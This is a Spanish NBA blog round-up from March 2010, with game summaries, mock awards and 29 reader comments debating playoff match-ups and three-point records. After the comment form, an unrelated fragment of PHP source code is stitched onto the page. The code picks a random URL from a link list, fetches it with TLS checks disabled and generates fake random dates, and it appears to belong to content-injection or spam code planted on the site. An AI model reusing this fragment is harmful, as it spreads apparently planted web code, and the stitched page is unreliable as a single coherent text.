La Crónica (17/03/2010)

18 de March de 2010 por txusma

Poco a poco parece que se clarifican los Playoffs en ambas conferencias. A falta de un poco probable estirón en los últimos partidos de la regular, los Bulls pelearán también por el trofeo John Wall en lugar de por el anillo. Es lo que tiene no haber hecho un buen trabajo en los despachos. La lesión de Derrick Rose no ha hecho sino acelerar las cosas. Anoche nueva derrota esta vez ante unos Mavs muy sólidos que ya dan miedito a más de uno.

Y es que a Toronto le dio por ganar un partido, justo en el retorno de Calderon a la titularidad. Y no lo hizo frente a un cualquiera, no. Se impuso a los Hawks con un tirito de Chris Bosh a falta de 2 segundos para el final. También ganaron los Bobcats, con Gerald Wallace todavía lesionado, a uno de los gallitos del Oeste, Oklahoma. Vaya 2 equipos más duros para Playoffs… Seguro que más de uno intenta evitarlos. La sorpresa llegó en la derrota de los Bucks frente los Clippers. Tras 7 partidos consecutivos ganando al banquillo de Milwaukee le dio por no presentarse y una buena defensa de los angelinos fue suficiente para llevarse la victoria.

En la parte alta del Este victorias de los 3 primeros. Cavs y Celtics se pasaron por encima de Pacers y Knicks con relativa facilidad. Aún más facilidad encontró Orlando para superar a unos irreconocibles Spurs con un Tim Duncan jugando uno de los peores partidos de su carrera. A los Magic les dio tiempo a sestear y aún así vencieron de 26 puntos. Nunca hay que fiarse de los tejanos pero ahora mismo no apostaría mi dinero por ellos.

En el resto de partidos de la jornada, Houston se impuso a Memphis en el duelo de los primeros equipos del Oeste que no estarán finalmente en la post-temporada (¿No os queda un poso de decepción cuando hablamos de la franquicia de Marc Gasol?); Utah apalizó a Minnessota; Golden State ganó en su ruleta rusa particular a los Hornets; y los Sixers, con un Jrue Holiday que parece haber explotado, pasaron por encima de los Nets.

PREMIOS

MVP: Rey, día sí y día también. 32 puntos, 9 rebotes, 9 asistencias, 3 robos y 3 tapones. Estas estadísticas sólo pueden ser de Lebron James.

Rookie: Ojito con Jrue Holiday. Ya nos avisaban que llegaba muy verde a la liga pero que tenía muchísimo potencial y en este final de temporada lo está demostrando. 19 puntos, 7 rebotes y 7 asistencias. Darren Collison cuajó un buen partido a pesar de las 8 pérdidas: 20 puntos, 6 rebotes y 14 asistencias.

Sorpresa: A pesar de jugar en los Warriors se supone que no cualquiera puede anotar 30 puntos, pillar 6 rebotes y robar 4 balones, ¿verdad? Y Anthony Tolliver no es la primera vez que lo hace.

Decepción: 5 puntos (1 de 10) y 6 rebotes. Números totalmente indignos del gran Tim Duncan… Lo curioso es que no es la primera vez en estos últimos 3 meses que Duncan no sobrepasa los 10 puntos.

Esfuerzo en vano: 36 puntos, 15 rebotes, 5 asistencias y derrota frente los Warriors, que vale, te inflan las estadísticas pero si te pueden matar, te matan. Mala suerte para David West. David Lee está un poco más acostumbrado a esto de perder a pesar de hacer partidazos como el de ayer (29 puntos, 9 rebotes y 7 asistencias).

Comenta

29 comentarios a esta entrada

  1. PIRATA dice:
    #1

    Se dibuja una posible primera ronda para Lakers de “cangelo” Thunder/Suns/Spurs/Blazers, curiosamente ahora preferiria a Spurs o Suns cuando a principios de temporada ni en pintura, la cosa se pone interesante….

      Citar

  2. Love Denise dice:
    #2

    yo creo que los Lakers deberian pasar de 1era ronda sin apuros, aunque todos recordaremos esa eliminatoria contra los Rockets (sin Yao y T-Mac) yéndose al 7º partido y con un Brooks sublime. Lo que está claro es que van a tener que sudar para llegar a la Final del Oeste, en cambio Cavs y Magic, en teoría, deberían llegar más descansados a la Final del Este.
    A los Celtics los descarto por el anillo, y a los Spurs y a los Suns también desde hace ya un par de años. Creo que esto va a ser cosa de 3 (lakers, cavs y Magic) sin perder de vista a los Nuggets y a los Mavs.

      Citar

  3. sayim dice:
    #3

    Los PO en el Oeste van a echar chispas desde el principio (en el este lo serio empieza en segunda ronda), no veo que nadie tenga la posiblidad de barrer a nadie y no me extrañaría ver mas de una eliminatoria llegandoa sextos o septimos partidos.
    Con respecto a Lakers, estoy con Pirata. Muy mal cruce con Thunder (se adapta muy mal a su juego) y con Portland (son muy superiores, pero el Rose Garden no les gusta). Veo muy favorito a LAL (4-0 o 4-1) contra Spurs o Suns.
    Con respecto a lo del equipo de Marc, me da un poco de pena que se queden fuera de PO tanto ellos como los Rockets que han hecho una campaña muy digna y se merecen estar mucho más que otros equipos que si estarán.
    Cuando haya cruces definitivos de PO, creo que deberíais organizar otra porra con los equipos que irán accediendo a cada ronda (y desempatar con los resultados y el MVP de las finalees, por ejemplo…).
    Un saludo

      Citar

  4. pcerezo dice:
    #4

    Creo que Lakers no debería temer nada de los posibles cruces de primera ronda. Yo creo que en semis se deberían medir a Utah, no creo que tengan problemas y ya la batalla con unos posibles Mavs sí va a ser a cara de perro…pero sigo viéndolos favoritos.

    En cuanto al Este la final Orlado-Cavs puede ser tremenda y cada día que pasa me entran dudas…

    Por cierto lo de Turkoglu es tremendo…lo que es sacar a un jugador de una dinámica…

      Citar

  5. rojorob dice:
    #5

    Eso, eso, otra porra. Yo de momento vuelvo a apostar por los Nets.

      Citar

  6. sayim dice:
    #6

    Es que algunos conocimos el blog demasiado tarde para participar, Rojorob, yo este año, hablando con un amigo, le decia que los Nets iban a hacer una buena campaña. Si hubiera apostado tambien les habria dado post-temporada… xD

      Citar

  7. sergio dice:
    #7

    Yo tambien les di Rojorob. Y a mucha honra!!

    Ninguno meteis a Atlanta en la pomada para poner en problemas a los grandes. Juraria que es de esos equipos que pueden hacerle daño a Cleveland la verdad: los dos tienen falta de centimetros en las posiciones interiores y su juego exterior (especialmente base y escolta) pueden funcionar a rachas. O te hacen ganar un partido o te hacen perderlo. Eso si, no se quien seria el defensor de LeBron en Atlanta…

      Citar

  8. sergio dice:
    #8

    Por cierto, ayer perdieron los Bucks con un “mas dificil todavia”: hacer que 6 jugadores de los LAC estuvieran en dobles figuras

      Citar

  9. Kiki dice:
    #9

    Marvin Williams y Mo Evans pueden defender bien a LeBron… Cuando se han enfrentado, van cambiando la defensa para desgastarle, incluso Joe Johnson le ha defendido a veces. Yo veo complicado que Atlanta llegue a Final de Conferencia, pero si mejoran fuera de casa todo es posible…

      Citar

  10. Love Denise dice:
    #10

    los bucks perdieron, pero ten en cuenta que no jugaba el eterno All-Star Delfino,

      Citar

  11. Love Denise dice:
    #11

    los bucks perdieron, pero ten en cuenta que no jugaba el eterno All-star Delfino.

      Citar

  12. sergio dice:
    #12

    Si,,, es un factor determinante.

    A mi tambien me sorprenderia que llegaran a una final de Conferencia los Hawks, pero creo que son la alternativa mas poderosa a Cavs y Orlando, incluso por encima de Boston en este momento..

    He estado hechando un ojo al 7 de 7 de Brooks en triples y me he puesto a curiosear para lanzar una pregunta… ¿Sabeis quienes son los dos unicos jugadores en activo que han anotado mas triples que Brooks en un partido con un 100% de acierto?

      Citar

  13. Kiki dice:
    #13

    Kapono y Jamal Crawford?

      Citar

  14. Love Denise dice:
    #14

    en la NBA no sé, pero recuerdo un 9 de 9 en Stombergas en Euroliga, creo que contra el Tau

      Citar

  15. Viva_Dirk dice:
    #15

    De memoria me suena un 9 de 9 de Sprewell, pero no estoy seguro.

    No creo que los Lakers deban tener problemas en 1ª ronda, no me importaria que fuese contra Oklahoma, aunque preferiria a los Suns.

      Citar

  16. sergio dice:
    #16

    Sprewell no es ningun jugador en activo Dirk… aunque tengas razon. Y tampoco son ninguno de los que ha dicho Kiki. Lo de Stombergas no lo sabia. Eso si que tiene merito…

    Uno de los dos de la pregunta ha estado a punto de retirarse hace bien poquito

      Citar

  17. sayim dice:
    #17

    Finley???no lo se, pero no me extrañaria

      Citar

  18. sergio dice:
    #18

    Sip, ese es uno. Anotó 8 de 8 en un partido Cavs-Mavericks en Marzo del 2005. El que falta hizo la misma marca que Sprewell como bien ha dicho Dirk, con 9 de 9.

      Citar

  19. sergio dice:
    #19

    No es americano y es el 17º en porcentaje de triples en toda la historia

      Citar

  20. Love Denise dice:
    #20

    Stojakovic???

      Citar

  21. sergio dice:
    #21

    nup

      Citar

  22. Uno cualquiera dice:
    #22

    A mi me gustaría que los Bobcats quedaran 8ºs de la conferencia este, porque llevan un 3-1 a favor contra los Cavs en lo que va de temporada.

    Quien sabe si se podría repetir lo de los Mavs vs Warriors hace 3 añitos…

      Citar

  23. Txusma dice:
    #23

    Sería bonito, no? Se le congelaría la sonrisa a Lebron? Dejaría de hacer esos bailecitos antes de los partidos?

      Citar

  24. Uno cualquiera dice:
    #24

    Ben Gordon en el partido:

    Washington Wizards 101 vs Chicago Bulls 103

    el 14 de abril 2006 (basketballreference es nuestro amigo xD)

      Citar

  25. sergio dice:
    #25

    un ¡yeah! para “uno cualquiera”

      Citar

  26. Uno cualquiera dice:
    #26

    Acepto parte del regalo que te llevarás como ganador del Trivial como recompensar por acertar esta pregunta……

    No cuela, ¿no? jajajaja

      Citar

  27. HeiNeKeN dice:
    #27

    Vince Carter no hizo tambien un 9 de 9 en triples? aunque creo que fue en Playoffs, contra los Sixers… hablo asi de memoria, que me suena haberlo visto alguna vez…

      Citar

  28. sergio dice:
    #28

    Que yo sepa un 9 de 13 contra los Sixers en los Playoffs de 2001 Heineken. No tengo constancia de otro partido de Carter en Playoffs con un 100 % y ese numero de triples

      Citar

  29. HeiNeKeN dice:
    #29

    vale, entonces lo que hizo fue meter 8 de 8 seguidos y luego ya siguio hasta hacer el 9 de 13, k acabo de ver un dvd que tengo de la NBA y el comentarista dice eso, que lleva 8 de 8, asi que luego ya debio fallar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>